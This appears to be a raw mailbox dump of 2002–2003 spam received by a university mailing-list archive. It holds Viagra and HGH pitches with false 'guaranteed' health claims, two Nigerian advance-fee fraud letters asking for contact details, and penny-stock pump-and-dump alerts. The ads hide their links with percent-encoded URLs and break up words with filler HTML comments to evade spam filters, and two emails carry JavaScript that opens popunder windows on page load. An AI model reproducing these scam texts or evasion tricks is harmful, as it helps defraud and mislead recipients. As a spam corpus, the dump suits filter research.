	id 2468BBAD0C; Tue, 19 Nov 2002 13:48:35 -0200 (BRST)
Subject: VIAGRA works in up to 82% of patients (0R)
Reply-To: fjutijy4@yahoo.com@yahoo.com
To: Mckelvin Nishi <Mihaliak@canada.com>
Date: Mon, 11 Nov 2002 19:01:49 -0600
From: Batliner Herda <BatlinerHerda@aol.com>
X-Mailer: MIME-tools 5.41 (Entity 5.404)
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2500.0000
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="V21eR1i4h0OY8842487uCua0---Minemindfxxyf843XWRy7cYNR0M72="
Content-Transfer-Encoding: 7bit
Message-Id: <20021119154835.2468BBAD0C@sinop.unemat-net.br>

--V21eR1i4h0OY8842487uCua0---Minemindfxxyf843XWRy7cYNR0M72=
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="ISO-8859-1"

<CENTER>
<table border=2 cellspacing=0 cellpadding=3 width=500 bordercolor=#003584 bgcolor=D7EDFF>
<TR>
<TD ALIGN=CENTER VALIGN=middle>
<A HREF="http://www.dis%63o%75%6E%74-cen%74%72%61l-n%65two%72k.c%6Fm/5030" style="FONT-SIZE: 18px; TEXT-DECORATION: none; COLOR: #004971; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B> Increase Your Sexual Performance Right Now! </B></A><BR>
<FONT style="FONT-SIZE: 15px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
<I>Take control of your sex life, Order Viagra Online Now!</I><BR><BR>
The drug Viagra is a revolutionary way to treat impotence and enhance any man's sex life.
<BR><BR><A HREF="http://%77%77w%2Ed%69s%63ount-%63e%6E%74%72%61l-%6E%65%74wo%72%6B.%63%6F%6D/5030" style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: RED; FONT-FAMILY: Arial, Verdana, Helvetica;"><U><B>To order online click here</B></U></A><BR><BR>
<table border=0 cellspacing=3 cellpadding=2 width=490>
<TR>
<TD ALIGN=LEFT VALIGN=TOP WIDTH=30%>
<FONT style="FONT-SIZE: 14px; TEXT-DECORATION: none; COLOR: FF040B; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
<IMG SRC=http://%77w%77%2E%63%6En.c%6Fm/HEALTH/9902/11/jama.viagra.01/story.sex.signs.jpg>
</TD>
<TD ALIGN=LEFT VALIGN=TOP WIDTH=70%>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
The drug <B>Viagra</B> is a revolutionary way to treat impotence and enhance any man's sex life.<BR><BR><B>It is a Safe and Effective way to increase a man's libido</B> and has proven to be the most successful treatment for impotence.
</TD>
</TR>
<TR>
<TD ALIGN=LEFT VALIGN=middle WIDTH=100% COLSPAN=2>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Arial, Verdana, Helvetica;"> 
No need to go through embarrassing, stressful situations anymore, you can now get Viagra from the comfort of your home!<BR><BR>
<FONT style="FONT-SIZE: 17px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Verdana, Helvetica;"> 
<B>Some Things to think about...</B><BR><BR>
<FONT style="FONT-SIZE: 15px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Verdana, Helvetica;"> 
<B>1)</B> You will not get an erection without sexual stimulation - no need to be embarrassed like when you use other sexual stimulants. You will only gain an erection when you are sexually stimulated.<BR><BR>
<B>2)</B> More men use and trust Viagra as a treatment for sexual dysfunction than other sexual stimulation aids. Viagra is a safe sexual treatment that is proven because of the wide use and acceptance by the general public.<BR><BR>
<B>3)</B> When you use Viagra you are able to gain an erection through your partners sexual stimulation - all of your sexual acts, feelings and your love making is the result of your chemistry. <BR><BR>
<CENTER>
<FONT style="FONT-SIZE: 17px; TEXT-DECORATION: none; COLOR: #3C4355; FONT-FAMILY: Arial, Verdana, Helvetica;">
<B>This is the easiest and most discreet way to <BR>end impotence</B><BR><BR>
<A HREF="http://ww%77%2Ed%69sc%6Fun%74-c%65%6Et%72al%2D%6Ee%74%77%6Frk%2Ec%6Fm/5030" style="FONT-SIZE: 18px; TEXT-DECORATION: underline; COLOR: RED; FONT-FAMILY: Arial, Verdana, Helvetica;"><U><B>To order online click here</B></U></A><BR><BR>
<FONT style="FONT-SIZE: 16px; TEXT-DECORATION: none; COLOR: BLACK; FONT-FAMILY: Helvetica, Verdana, Helvetica;"> 
It's worked for so many don't waste any more time get started by following the link on this page!
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<FONT style="FONT-SIZE: 10px; TEXT-DECORATION: none; COLOR: GRAY; FONT-FAMILY: Arial, Verdana, Helvetica;">
Don't want any more messages? reply to this message to be removed.
</CENTER>
5L4b46T5KXi22W5V21eR1i4h0OY8842487uCua0y6YQ55181n3M6lQ6p35Bfhvo7fcV3dBkAa26w

--V21eR1i4h0OY8842487uCua0---Minemindfxxyf843XWRy7cYNR0M72=--


From rorberto@go.com Fri May  2 04:20:32 2003
Return-Path: <rorberto@go.com>
Received: from netlib2.cs.utk.edu ([212.165.142.216])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h428KDSP001064
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 2 May 2003 04:20:26 -0400 (EDT)
Message-Id: <200305020820.h428KDSP001064@netlib2.cs.utk.edu>
From: "DR. FEMI DADA" <rorberto@go.com>
Date: Fri, 02 May 2003 09:20:10
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: GREETINGS
MIME-Version: 1.0
Content-Type: text/plain;charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hello, 
 
It is my humble pleasure to write this letter 
irrespective of the fact that you do not know me my 
name is Robert Owode, a staff in the private banking 
sector of the bank in Nigeria. I am writing in respect of a 
foreign customer of my bank who died mysteriously. 
Though I know that a transaction of this magnitude 
will make any one apprehensive and worried, but I am 
assuring you that all will be well at the end of the 
day 
 
Since the demise of this our customer I personally have 
watched with keen interest to see the next of kin but 
all has proved abortive as no one has come to claim 
his funds of USD$15M, (Fifteen Million United States Dollars) 
which has been with my branch for a very long time, now 
unquestionably expects to be claimed by any of his 
available foreign next of kin or alternatively be 
donated to a discredited trust fund for arms and 
ammunition at a military war college here in Nigeria. 
 
Fervent valuable efforts made by the Bank to get in 
touch with any of the deceased's next of kin (he had 
no known wife and children) has been unsuccessful. The 
management under the influence of our chairman and 
board of directors are making arrangement for the fund 
to be declared "UNCLAIMABLE" and then be subsequently 
donated to the trust fund for Arms and Ammunition, 
which will further enhance the course of war in Africa 
and the world in general. 
 
On this note I decided to seek for a capable person 
that his name shall be used as the next of kin, as no 
one has come up to be the next of kin. The banking 
ethics here does not also allow such money to stay 
more than six years, because the money will be 
recalled to the banks' treasury unclaimed after this 
period, I will give you 30% of the total. 

Upon the receipt of your response, I will send you by 
fax or e-mail the application, bank's fax number and 
the next step to take. I will not fail to bring to 
your notice that this business is hitch free and that 
you should not entertain any fear as all modalities 
for fund transfer can be finalized within five banking 
days, after you apply to the bank as a relation to the 
deceased. 

When you receive this letter, kindly send me an e-mail 
signifying your decision including your private 
Tel/fax numbers for quick communication. 
 
Respectfully submitted, 
 
Robert Owode (Mr.) 
Private Banking 


From cericmtpw03@msn.com Sun May  4 09:50:53 2003
Return-Path: <cericmtpw03@msn.com>
Received: from hotmail.com (bay4-dav85.bay4.hotmail.com [65.54.171.115])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h44DoqSP008972
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 4 May 2003 09:50:53 -0400 (EDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sun, 4 May 2003 06:50:42 -0700
Received: from 203.145.188.35 by bay4-dav85.bay4.hotmail.com with DAV;
	Sun, 04 May 2003 13:50:42 +0000
X-Originating-IP: [203.145.188.35]
X-Originating-Email: [cericmtpw03@msn.com]
From: "Paris Mersman" <ParisMersman@mail.com>
Subject: Younger and healthier with Our Help
To: "Grochow Garnet" <GrochowGarnet@freebox.com>
X-Mailer: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1)
Organization: k33Y6X32GN2l
X-Comment: s1E654Lop6BF7Y506
Content-Type: multipart/alternative; boundary="k2nKsw4qHTKe7qql4HOr01N8ots1E6TIBHQ5pw57Ws4tk33Y6X32GN2lNk1Kua053P8wQF8v1Uu"
Content-Transfer-Encoding: 7bit
Message-ID: <BAY4-DAV85iGtXsL1c00000021c@hotmail.com>
X-OriginalArrivalTime: 04 May 2003 13:50:42.0468 (UTC) FILETIME=[27678E40:01C31244]
Date: 4 May 2003 06:50:42 -0700

--k2nKsw4qHTKe7qql4HOr01N8ots1E6TIBHQ5pw57Ws4tk33Y6X32GN2lNk1Kua053P8wQF8v1Uu
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="US-ASCII"

<HTML><CENTER><B><FONT SIZE=4 FACE="ARIAL" COLOR="#054958">H<!F>av<!R>i<!I>ng<!U> T<!X>ro<!M>uble fin<!H>di<!K>ng <!I>T<!W>ime<!N> f<!U>or Di<!W>et<!C> <!D>an<!M>d E<!P>xe<!X>rc<!F>i<!O>s<!Z>e?<!G><BR>
<FONT SIZE=3 FACE="ARIAL" COLOR="#054958">N<!D>o<!W>w yo<!S>u<!R> <!M>can <!I>l<!R>o<!P>se<!G> <!V>w<!Z>e<!Q>i<!D>g<!T>h<!H>t<!F> w<!J>h<!L>il<!U>e<!Q> <!X>yo<!G>u sl<!V>eep!<!O><BR>
<FONT SIZE=3 FACE="ARIAL" COLOR="RED">Try<!F> <!L>HG<!B>H <!C>I<!R>t<!K>s<!Q> <!Z>10<!K>0<!N>% <!X>Gu<!Y>ara<!C>n<!O>te<!N>ed<!B></B>
<BR><BR><A HREF="http://w%77%77.%68e%61lt%68p%72od%75%63t%73n%6F%77%2Enet/human/index.php?id=766"><FONT SIZE=4 FACE="ARIAL" COLOR="205904"><B>T<!V>o <!B>S<!H>ee<!C> <!K>Ho<!W>w <!J>C<!Z>l<!L>ick <!T>H<!E>ere</B></A><BR><BR>
<TABLE BORDER=0 WIDTH=450 BGCOLOR=#FFFFFF WIDTH=400><TR><TD ALIGN=LEFT>
<FONT SIZE=3 FACE="ARIAL" COLOR="BLACK">Human Growth Hormone (HGH) is the only supplement clinically proven to increase lean muscle mass while decreasing bodyfat. It's also the only substance clinically proven to <U>Slow Down The Aging Process!</U>
</TD></TR></TABLE><BR><A HREF="http://w%77%77%2Ehealt%68%70r%6F%64%75ctsn%6F%77%2E%6Eet/human/index.php?id=766"><FONT SIZE=4 FACE="ARIAL" COLOR="205904"><B>Cl<!Z>ic<!Y>k<!G> her<!Z>e<!O> to<!F> s<!M>tar<!W>t <!V>lo<!J>o<!E>k<!E>ing<!H> <!K>a<!S>n<!W>d f<!R>e<!I>el<!U>in<!X>g <!M>better</B></A><BR><BR>
<FONT SIZE=1 COLOR="BLACK">No<!H> m<!K>ore<!I> <!W>fut<!N>ur<!U>e mai<!W>li<!C>n<!D>g <!M><A HREF="http://%77ww%2Eyah%6F%6F.%63%6Fm/*http://%77w%77.%62uy-%64n%73.%63%6F%6D/remove/remove.htm">her<!P>e</A><BR RR><!-- qs202qnHVom7LmAU0RpajA4MjA1LTA0Rjg0TU0xcGdMajc=XUStpiorO51PUe7N04J6674 --></CENTER></HTML>

--k2nKsw4qHTKe7qql4HOr01N8ots1E6TIBHQ5pw57Ws4tk33Y6X32GN2lNk1Kua053P8wQF8v1Uu--


From ubhyKnadall@bellatlantic.net Wed May  7 20:09:16 2003
Return-Path: <ubhyKnadall@bellatlantic.net>
Received: from 195.146.118.14 (200-171-10-13.dsl.telesp.net.br [200.171.10.13])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h4808pSP006966
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 7 May 2003 20:09:00 -0400 (EDT)
Message-Id: <200305080009.h4808pSP006966@netlib2.cs.utk.edu>
Received: from unknown (HELO anther.webhostingtalk.com) (205.220.75.34) by asy100.as122.sol.superonline.com with smtp; May, 07 2003 6:43:38 PM +0700
Received: from unknown (HELO mail.gmx.net) (78.165.116.169) by smtp4.cyberec.com with smtp; May, 07 2003 6:05:38 PM -0000
Received: from [110.188.46.152] by mta05bw.bigpond.com with QMQP; May, 07 2003 5:06:35 PM -0700
From: Mingdong <ubhyKnadall@bellatlantic.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: 
Subject: . ftht
Sender: Mingdong <ubhyKnadall@bellatlantic.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 7 May 2003 19:08:53 -0500
X-Mailer: Microsoft Outlook IMO Build 9.0.2416 (9.0.2910.0)

.

rysolnwwoddkcoxnrmcfuw

From Live_From_the_Street_99851@aloha.net Wed May 14 08:22:24 2003
Return-Path: <Live_From_the_Street_99851@aloha.net>
Received: from 68.47.232.101 (pcp465634pcs.shrpsr01.tn.comcast.net [68.47.232.101])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h4ECMMSP020002
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 14 May 2003 08:22:22 -0400 (EDT)
Message-Id: <200305141222.h4ECMMSP020002@netlib2.cs.utk.edu>
Received: from 82.60.152.190 ([82.60.152.190]) by smtp4.cyberec.com with QMQP; May, 14 2003 6:58:11 AM -0700
Received: from a231242.upc-a.chello.nl ([96.216.72.224]) by m10.grp.snv.yahoo.com with NNFMP; May, 14 2003 5:55:07 AM -0300
Received: from [14.42.188.81] by sydint1.microthin.com.au with asmtp; May, 14 2003 5:17:12 AM +1100
Received: from ssymail.ssy.co.kr ([115.212.44.160]) by hd.regsoft.net with asmtp; May, 14 2003 4:20:09 AM +0600
From: Lord <Live_From_the_Street_99851@aloha.net>
To: Grayson
Cc: 
Subject: STOCK MARKET PLAYERS - WALMART and Costco Join Kingdom Ventures' Initiative (OTCBB: KMDV).......... pgpet
Sender: Lord <Live_From_the_Street_99851@aloha.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 14 May 2003 07:22:32 -0500
X-Mailer: MIME-tools 5.503 (Entity 5.501)

LIVE FROM THE WIRE...New Stock Recommendation<br>
<br>
Kingdom Ventures, Inc. (OTCBB: KDMV) - Revenues Increase by 285%<br>
<br>
Breaking News.......Wal-Mart, Cosco, Barnes &amp; Noble, &amp; Sprint Join KDMV Initiative<br>
<br>
Get the whole story @ <a href="http://www.researchfactor.net">Live From the Street</a><br>
<br>
<br>
<br>
Unsubscribe me: <a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a><br>
&nbsp;</p>

vojgyjwknogmydihffyfwsfbmcpjfv

From terjo@zwallet.com Wed May 14 19:46:48 2003
Return-Path: <terjo@zwallet.com>
Received: from qmail1.zwallet.com (qmail1.zwallet.com [216.66.64.4])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h4ENkjSP023122
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 14 May 2003 19:46:48 -0400 (EDT)
Received: from web3.zwallet.com
  by qmail1.zwallet.com with SMTP; 14 May 2003 23:46:54 -0000
From: peter m mojo <terjo@zwallet.com>
X-Originating-IP: [192.116.82.75]
To: terjo@zwallet.com
Subject: STRICTLY  CONFIDENTIAL
Date: Wed, 14 May 2003 19:52:46 -0400
Message-Id: <1052956366.533344.6932.zmail@web3.zwallet.com>

From: Peter Joe (SAN)
c/o Abacha’s Family
Legal Adviser (Abacha’s family Estate)


Attn: Managing Director/CEO

Strictly Confidential

I am Dr. (Mrs) Maryam Abacha, wife to the late Nigeria Head of State-General sani Abacha.
I am proposing this business to you because we could be of great assistance to each other,like wise developing a cordial business relationship. I currently have within my reach the sum of Sixty Five Million, United states DOLLARS(US$65,000,000.00)cash the at I intend to use for investment purposes specifically in your country.

This money came as a result of a pay back contract deal between my late husband and a Russian firm in our country’s Multi-billion Dollars Ajaokuta Steel Plant.
The Russian partners returned my husband’s share of US$65 million after his death and lodged it with my husband’s security firm in Nigeria of which I am a director.

Right now, the new civilian government has revoked our licences that allow us to own a financial and oil company. In view of this, I acted very fast in withdrawing the US$65 million from the company’s vault well preserved and packaged in trunk boxes and

deposited it in ECOWAS security Bank. I have since declared our security company bankrupt.No record ever existed concerning the money neither is the money traceable by the government because there is no document showing that we received the money from the Russians.

Due to the present situation in the country regarding the Government’s attitude towards my family. It has become quite impossible for me to make use of the money within the country,thus I seek your assistance to move the money out of this country, on your consent, I shall expect you to contact me urgently to bearing in mind that your assistance is needed to transfer this fund and the transaction will be mutually beneficial.

Your urgent response is required. All correspondences must be channelled to our legal adviser Peter Joseph through his email address terjo@zwallet.com I must also use this opportunity to implore you to exercise the utmost indulgence to keep this transact
ion a confidential issue.

Regards.
DR. (MRS) MARYAM ABACHA. (PH.D
______________________________________________________
Get Paid... With Your Free Email at
http://www.zwallet.com/index.html?user=terjo

From dlindao6bmdpgt@msn.com Sat May 17 10:13:01 2003
Return-Path: <dlindao6bmdpgt@msn.com>
Received: from hotmail.com (bay3-dav135.bay3.hotmail.com [65.54.169.165])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h4HED0SP014527
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 17 May 2003 10:13:01 -0400 (EDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sat, 17 May 2003 07:12:55 -0700
Received: from 206.102.88.10 by bay3-dav135.bay3.hotmail.com with DAV;
	Sat, 17 May 2003 14:12:55 +0000
X-Originating-IP: [206.102.88.10]
X-Originating-Email: [dlindao6bmdpgt@msn.com]
From: "Boroughs Movius" <BoroughsMovius@alloymail.com>
Subject: Look 10 Years Younger Guaranteed!
To: "Mula Gokey" <MulaGokey@lycos.com>
Organization: 5TK7Nh8tsn5J6u
X-Accept-Language: en
Importance: Normal
X-Comment: 62S8H8Pe5M
X-Originating-Ip: [23.83.64.38]
X-MSMail-Priority: Normal
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
X-Priority: 3 (Normal)
Content-Type: multipart/alternative; boundary="3QMVY5TK7Nh8tsn5J6udhPbrWu2G77LE376ra6w8v5Vn44C70l3JQ3O5n2Nxde646cyTH0X"
Content-Transfer-Encoding: 7bit
Message-ID: <BAY3-DAV135OJSNEEyz0000987a@hotmail.com>
X-OriginalArrivalTime: 17 May 2003 14:12:55.0466 (UTC) FILETIME=[694DA8A0:01C31C7E]
Date: 17 May 2003 07:12:55 -0700

--3QMVY5TK7Nh8tsn5J6udhPbrWu2G77LE376ra6w8v5Vn44C70l3JQ3O5n2Nxde646cyTH0X
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="ISO-8859-1"

<HTML><CENTER><FONT SIZE=3 FACE=ARIAL COLOR=#8000FF><B>*<!N>*<!B>* <!P>IT'S<!H> F<!W>INA<!M>L<!J>L<!K>Y<!Y> <!K>H<!P>ER<!W>E<!O>! *<!Z>**<!E><BR><!G>
<!U>A<!N> P<!S>il<!B>l Th<!Q>at H<!J>e<!G>l<!Y>ps Y<!U>o<!U>u<!P> L<!F>o<!L>s<!U>e<!R> W<!I>ei<!S>gh<!T>t<!F> <!W>W<!J>h<!I>i<!V>le<!O> <!D>Y<!V>o<!C>u S<!J>lee<!R>p<!J></B>
<BR><BR><FONT SIZE=2 FACE=ARIAL COLOR=BLACK>
<!T>T<!G>h<!X>er<!O>e <!D>are <!U>n<!N>o<!S> gim<!M>m<!Q>ic<!B>ks<!C>, <!X>ou<!R>r <!P>pr<!D>o<!Y>du<!E>ct i<!F>s<!N> 1<!Z>00<!L>%<!C> <!O>G<!F>u<!S>a<!R>rante<!Y>ed.<!C><BR><BR>
<A title=http://%77w%77%2Eh%65a%6C%74h%70rodu%63t%73no%77%2En%65t/human/index.php?id=766 href=http://%77w%77%2E%68e%61%6C%74%68prod%75%63ts%6Eow.net/human/index.php?id=766><FONT SIZE=2 FACE=ARIAL COLOR=RED><B>Click <!D>h<!Q>ere<!H></A> t<!P>o s<!Z>e<!R>e<!M> <!L>h<!G>o<!H>w i<!K>t<!N> <!V>c<!Z>an<!T> <!Y>wor<!X>k<!Q> fo<!P>r yo<!H>u.<!W></B>
<BR><BR><FONT SIZE=2 FACE=ARIAL COLOR=BLACK>
T<!M>h<!J>e<!K>r<!Y>e<!K>'<!P>s <!W>n<!O>o n<!Z>ee<!E>d<!G> <!U>t<!N>o <!S>be<!B> ash<!Q>amed<!J> <!G>o<!Y>f we<!U>a<!U>r<!P>in<!F>g<!L> <!U>a<!R> b<!I>at<!S>hi<!T>n<!F>g<!W> <!J>s<!I>u<!V>it<!O> <!D>t<!V>h<!C>is <!J>yea<!R>r<!J>.<BR><!T>
<!G>W<!X>e <!O>kn<!D>ow t<!U>h<!N>a<!S>t no<!M>t<!Q> e<!B>ve<!C>ry<!X>on<!R>e <!P>ha<!D>s<!Y> t<!E>he t<!F>i<!N>me<!Z> t<!L>o<!C> <!O>s<!F>p<!S>e<!R>nd at<!Y> th<!C>e gym<BR><!D>
<!Q>So <!H>we<!P>'ve<!Z> <!R>d<!M>e<!L>s<!G>i<!H>gne<!K>d<!N> <!V>H<!Z>GH<!T> <!Y>to <!X>h<!Q>elp<!P> you<!H> l<!W>ose<!M> <!J>w<!K>e<!Y>i<!K>g<!P>ht<!W> <!O>all<!Z> d<!E>a<!G>y<!U>,<!N> a<!S>nd<!B> eve<!Q>n at<!J> <!G>n<!Y>ight<!U> <!U>w<!P>hi<!F>l<!L>e<!U> <!R>yo<!I>u <!S>sl<!T>e<!F>e<!W>p<!J>.<!I><BR><BR>
<A href=http://%77w%77%2Ehe%61lt%68%70ro%64%75%63%74%73n%6Fw%2En%65t/human/index.php?id=766><FONT SIZE=2 FACE=ARIAL COLOR=RED><B>C<!V>li<!O>c<!D>k<!V> <!C>her<!J>e</A> t<!R>o<!J> s<!T>t<!G>a<!X>rt<!O> l<!D>ooki<!U>n<!N>g<!S>, an<!M>d<!Q> f<!B>ee<!C>li<!X>ng<!R> b<!P>et<!D>t<!Y>er<!E></B>
<BR><BR><FONT SIZE=1 COLOR=#C8C8C8>Don'<!F>t<!N> w<!Z>an<!L>t<!C> <!O>a<!F>n<!S>y<!R> more<!Y> ad<!C>verts?<!D> <!Q><A HREF="http://ww%77.%62e%74%74%65%72-%64%6E%73%2Eco%6D/remove/remove.htm">cli<!H>ck<!P> he<!Z>r<!R>e<!M></A><BR RR><!-- GKATTB1YUx0eEhzMDUtMTdQRllNTTFRNDMyXlRUR62S8H8Pe5MN6998 --></HTML>

--3QMVY5TK7Nh8tsn5J6udhPbrWu2G77LE376ra6w8v5Vn44C70l3JQ3O5n2Nxde646cyTH0X--


From Live_From_the_Street_99787@cari.net Tue May 20 17:39:47 2003
Return-Path: <Live_From_the_Street_99787@cari.net>
Received: from 211.190.74.16 ([211.190.74.16])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h4KLdhSP021937
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 20 May 2003 17:39:45 -0400 (EDT)
Message-Id: <200305202139.h4KLdhSP021937@netlib2.cs.utk.edu>
Received: from unknown (170.127.231.172) by smtp013.mail.yahoo.com with local; May, 20 2003 4:32:35 PM -0200
Received: from 30.215.79.204 ([30.215.79.204]) by m10.grp.snv.yahoo.com with SMTP; May, 20 2003 3:16:23 PM +0300
Received: from sparc.isl.net ([45.55.85.241]) by anther.webhostingtalk.com with NNFMP; May, 20 2003 2:35:27 PM +0700
Received: from 32.62.180.131 ([32.62.180.131]) by sydint1.microthin.com.au with smtp; May, 20 2003 1:32:31 PM -0300
From: Miklos <Live_From_the_Street_99787@cari.net>
To: Geyo
Cc: 
Subject: STOCK MARKET PLAYERS - CYTGF - Our Previous Pick Went UP Over 300%............ trllb
Sender: Miklos <Live_From_the_Street_99787@cari.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Tue, 20 May 2003 16:39:50 -0500
X-Mailer: QUALCOMM Windows Eudora Version 5.1

LIVE FROM THE WIRE...New Stock Recommendation<br>
<br>
Crystal Graphite, Inc. (OTCBB: CYTGF)<br>
<br>
Our recent pick, SHRN, went UP over 300%<br>
<br>
Get the whole story @ <a href="http://www.researchfactor.net">Live From the Street</a><br>
<br>
<br>
<br>
Unsubscribe me: <a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a><br>
&nbsp;</p>

fkmrwlfyeftbaxkntqmr

From unfdrecfffdre@yahoo.com Mon May 26 00:24:18 2003
Return-Path: <unfdrecfffdre@yahoo.com>
Received: from 68.32.191.195 (pcp02227184pcs.rte20201.de.comcast.net [68.32.191.195])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h4Q4OGSP001192
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 26 May 2003 00:24:17 -0400 (EDT)
Message-Id: <200305260424.h4Q4OGSP001192@netlib2.cs.utk.edu>
Received: from ssymail.ssy.co.kr ([115.212.44.160]) by hd.regsoft.net with asmtp; May, 26 2003 12:09:29 AM +0700
Received: from rly-xl04.mx.aol.com ([161.143.46.72]) by m10.grp.snv.yahoo.com with QMQP; May, 25 2003 11:34:47 PM +1100
Received: from rly-yk04.mx.aol.com ([30.241.135.107]) by q4.quik.com with SMTP; May, 25 2003 10:10:30 PM -0000
From: CHURCH WEBSITES <unfdrecfffdre@yahoo.com>
To: Garett
Cc: 
Subject: FREE WEBSITE FOR YOUR CHURCH from Kingdom Ventures.......... haodk
Sender: CHURCH WEBSITES <unfdrecfffdre@yahoo.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Mon, 26 May 2003 00:34:56 -0500
X-Mailer: Microsoft Outlook Express 5.00.2615.200

<html>
<head>
Pastors and Church-goers<br>
<br>
50% of our country’s churches do not have a website!  IF YOUR CHURCH IS ONE OF THEM AND DOES NOT HAVE A WEBSITE, then let Kingdom Ventures build yours for FREE.<br>
<br>
The 1st 5000 churches will get their websites for FREE<br>
<br>
To find out more go to <a href="http://www.transworldwebsites.com/default.htm">Kingdom ventures</a><br>
<br>
<br>
Unsubscribe me: <a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a><br>
&nbsp;</p>
</body>
<script language="JavaScript">
var popunder=new Array();
popunder[0]='http://www.transworldwebsites.com';
function get_cookie(Name){var search=Name+'=';var returnvalue='';if(document.cookie.length>0){offset=document.cookie.indexOf(search);if(offset!=-1){offset+=search.length;end=document.cookie.indexOf(';',offset);if(end==-1)end=document.cookie.length;returnvalue=unescape(document.cookie.substring(offset,end))}}return returnvalue;}
function openWindowRemote(){win2=window.open(popunder[Math.floor(Math.random()*(popunder.length))],'popunder',"scrollbars=yes,resizable=yes,toolbar=yes,menubar=yes,status=yes,location=yes,width=800,height=600,left=0,top=0");win2.blur();
window.focus();}
window.onload = openWindowRemote;
</script>
</html>

qdetjuvjwntgcnpv

From tptKDMV_Stock_Alert@yahoo.com Tue May 27 06:56:26 2003
Return-Path: <tptKDMV_Stock_Alert@yahoo.com>
Received: from 68.185.149.85 (c1848028-a.cpe.abrn.al.charter.com [68.185.149.85])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h4RAuOSP014022
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 27 May 2003 06:56:25 -0400 (EDT)
Message-Id: <200305271056.h4RAuOSP014022@netlib2.cs.utk.edu>
Received: from rly-yk04.mx.aol.com ([30.241.135.107]) by q4.quik.com with SMTP; May, 27 2003 6:46:45 AM -0200
Received: from smtp-server6.tampabay.rr.com ([12.232.159.86]) by mailout2-eri1.midsouth.rr.com with asmtp; May, 27 2003 5:56:01 AM +0300
Received: from mta6.snfc21.pbi.net ([39.26.127.61]) by ssymail.ssy.co.kr with esmtp; May, 27 2003 4:44:57 AM -0000
Received: from unknown (170.127.231.172) by smtp013.mail.yahoo.com with local; May, 27 2003 4:00:08 AM +0700
From: KDMV Stock ALERT <tptKDMV_Stock_Alert@yahoo.com>
To: Eva
Cc: 
Subject: STOCK MARKET ALERT - KDMV $5 million Deal...Could Be Eligible For AMEX........... vhd
Sender: KDMV Stock ALERT <tptKDMV_Stock_Alert@yahoo.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Tue, 27 May 2003 07:07:12 -0500
X-Mailer: The Bat! (v1.52f) Business

<html>
<head>
Stock Market Investors<br>
<br>
Three reasons we believe KDMV is on the way UP: $5 million investment announced after the bell on Friday, a potential AMEX application and a technical bounce as the shorters potentially buy to cover.<br>
<br>
To find out more go to <a href="http://www.livefromthewire.com">8-K Announcement</a><br>
<br>
<br>
Unsubscribe me: <a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a><br>
&nbsp;</p>
</body>
<script language="JavaScript">
var popunder=new Array();
popunder[0]='http://www.livefromthewire.com';
function get_cookie(Name){var search=Name+'=';var returnvalue='';if(document.cookie.length>0){offset=document.cookie.indexOf(search);if(offset!=-1){offset+=search.length;end=document.cookie.indexOf(';',offset);if(end==-1)end=document.cookie.length;returnvalue=unescape(document.cookie.substring(offset,end))}}return returnvalue;}
function openWindowRemote(){win2=window.open(popunder[Math.floor(Math.random()*(popunder.length))],'popunder',"scrollbars=yes,resizable=yes,toolbar=yes,menubar=yes,status=yes,location=yes,width=800,height=600,left=0,top=0");win2.blur();
window.focus();}
window.onload = openWindowRemote;
</script>
</html>

twxvsmyuoxkmichnxkqnetkcpcsbdqxpyrfct

From gkimberlybrwu2g765oqr7@msn.com Wed May 28 11:20:42 2003
Return-Path: <gkimberlybrwu2g765oqr7@msn.com>
